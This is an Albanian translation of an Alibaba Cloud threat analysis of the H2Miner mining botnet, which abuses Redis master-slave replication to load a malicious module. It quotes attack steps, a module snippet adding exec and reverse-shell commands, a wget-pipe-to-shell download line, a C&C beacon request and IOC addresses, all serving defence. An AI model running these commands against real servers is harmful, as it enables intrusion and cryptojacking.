A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.

Para një ditë, një nga serverët e projektit tim u sulmua nga një virus i tillë. Në kërkim të përgjigjes për pyetjen "çfarë ishte kjo?" gjeta një artikull të shkëlqyer nga ekipi i Sigurisë së Alibaba Cloud. Duke qenë se nuk e gjeta këtë artikull në Habr, vendosa ta përkthej atë në mënyrë të veçantë për ju <3

Hyrje

Së fundmi, ekipi i sigurisë së Alibaba Cloud zbuloi një shpërthim të papritur të H2Miner. Ky lloj virusi keqdashës përdor mungesën e autorizimit ose fjalëkalimet e dobëta për Redis si porta për sistemet tuaja, e më pas sinkronizon modulin e tij të keq me slave përmes sinkronizimit master-slave dhe, përfundimisht, ngarkon këtë modul të keq në makinën e sulmuar dhe ekzekuton instrukcionet e keqja.

Në të kaluarën, sulmet ndaj sistemeve tuaja kryesisht ishin realizuar përmes një metode që përfshinte detyra të planifikuara ose çelësa SSH, të cilat shkruheshin në makinën tuaj pas hyrjes së sulmuesit në Redis. Fatmirësisht, kjo metodë nuk përdoret shpesh për shkak të problemeve me kontrollet e autorizimit ose për shkak të versioneve të ndryshme të sistemit. Megjithatë, kjo metodë e ngarkimit të modulit të keq mund të ekzekutojë drejtpërdrejt komandat e sulmuesit ose të fitojë akses në shell, që është e rrezikshme për sistemin tuaj.

Për shkak të numrit të madh serverësh të Redisëve të vendosur në internet (gati 1 milion), ekipi i sigurisë së Alibaba Cloud, si një kujtesë miqësore, rekomandon përdoruesve që të mos ofrojnë akses në Redis nga rrjeti dhe të kontrollojnë rregullisht besueshmërinë e fjalëkalimeve të tyre, si dhe, të mos jenë të ekspozuar ndaj sulmeve të shpejta.

H2Miner

H2Miner është një botnet minimi për sistemet Linux, i cili mund të depërtojë në sistemin tuaj në mënyra të ndryshme, duke përfshirë mungesën e autorizimit në Hadoop yarn, Docker dhe vulnerabilitetin e ekzekutimit të komandave të shkaktuara nga Redis (RCE). Botneti funksionon duke ngarkuar skriptet dhe programet e keqja për të minuar të dhënat tuaja, zgjerimin horizontal të sulmit dhe mbajtjen e lidhjeve të komandës dhe kontrollit (C&C).

Redis RCE

Për këtë çështje ka ndarë njohuritë e tij Pavel Toporkov në ZeroNights 2018. Pas versionit 4.0, Redis mbështet funksionin e ngarkimit të moduleve të jashtme, i cili u jep përdoruesve mundësinë të ngarkojnë skedarë .so, të kompiluar me C në Redis për të realizuar komanda të caktuara të Redis. Ky funksion, megjithëse i dobishëm, ka një vulnerabilitet, ku në modin master-slave skedarët mund të sinkronizohen me slave përmes modit fullresync. Kjo mund të përdoret nga sulmuesi për të transferuar skedarë të dëmshëm .so. Pas përfundimit të transferimit, ata ngarkojnë modul mbi instancën e prekur të Redis dhe ekzekutojnë çdo komandë.

Analiza e virusit të dëmshëm

Kohët e fundit, ekipi i sigurisë në Alibaba Cloud zbuloi se numri i grupit të minatorëve të dëmshëm H2Miner papritur kishte rritur ndjeshëm. Sipas analizës, procesi i përgjithshëm i lindjes së sulmit duket si në vijim:

A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.

H2Miner përdor RCE Redis për një sulm të plotë. Fillimisht, sulmuesit sulmojnë serverët e papenguar të Redis ose serverët me fjalëkalime të dobëta.

Pastaj ata përdorin komandën config set dbfilename red2.so për të ndryshuar emrin e skedarit. Pas kësaj, sulmuesit ekzekutojnë komandën slaveof për të vendosur adresën e hostit të replikimit master-slave.

Kur instanca e prekur e Redis vendos lidhjen master-slave me Redis-in e dëmshëm, që i përket sulmuesit, sulmuesi dërgon modulin e infektuar me komandën fullresync për të sinkronizuar skedarët. Pas kësaj, skedari red2.so do të ngarkohet në makinën e prekur. Pastaj, sulmuesit përdorin modulimin ./red2.so për të ngarkuar këtë skedar .so. Moduli mund të ekzekutojë komandat e sulmuesit ose të nxisë një lidhje të kthyer (backdoor) për të fituar akses në makinën e prekur.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Pas ekzekutimit të një komande të dëmshme, të tillë si / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, sulmuesi do të fshijë emrin e skedarit të kopjimit dhe do të bëjë shkarkimin e modulit sistemor për të pastruar gjurmët. Megjithatë, skedari red2.so do të mbetet ende në makinën e prekur. Përdoruesve u rekomandohet të kenë parasysh praninë e një skedari të dyshimtë në dosjen e instancës së tyre të Redis.

Përveç shkatërrimit të disa proceseve malware për vjedhjen e burimeve, sulmuesi ndoqi një skenar të dëmshëm, duke ngarkuar dhe ekzekutuar skedarë të dëmshëm në formë binare, për të 142.44.191.122/kinsing. Kjo do të thotë se emri i procesit ose emri i dosjes që përmban kinsing në hostin është tregues se ky sistem është prekur nga ky virus.

Sipas rezultateve të inxhinierisë reversi, programi malinj kryesisht kryen funksionet e mëposhtme:

  • Ngarkimi i skedarëve dhe ekzekutimi i tyre
  • Minimi
  • Mbajtja e lidhjes C&C dhe ekzekutimi i komandave të sulmuesit

A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.

Përdorni masscan për skanimin e jashtëm, për të zgjeruar ndikimin. Për më tepër, adresa IP e serverit C&C është e koduar fort në program, dhe hosti i prekur do të krijojë ndërveprime me serverin e komunikacionit C&C përmes kërkesave HTTP, ku informacioni i zombi (serveri i komprometuar) identifikohet në kokën e HTTP.

A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Metodat e tjera të sulmit

A new outbreak of H2Miner worms exploiting Redis RCE has been discovered.

Adresat dhe lidhjet që përdor krimbi

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Këshillë

Së pari, Redis nuk duhet të jetë i hapur për qasje nga Interneti dhe duhet të mbrohet me një fjalëkalim të fortë. Gjithashtu, është e rëndësishme që klientët të kontrollojnë mospraninë e skedarit red2.so në drejtorinë Redis dhe mungesën e 'kinsing' në emrin e skedarit / procesit në host.

Burimi: habr.com

Blini hostim të besueshëm për faqe interneti me mbrojtje DDoS, serverë VPS VDS 🔥 Blini hostim të besueshëm për faqe interneti me mbrojtje DDoS, serverë VPS VDS - ProHoster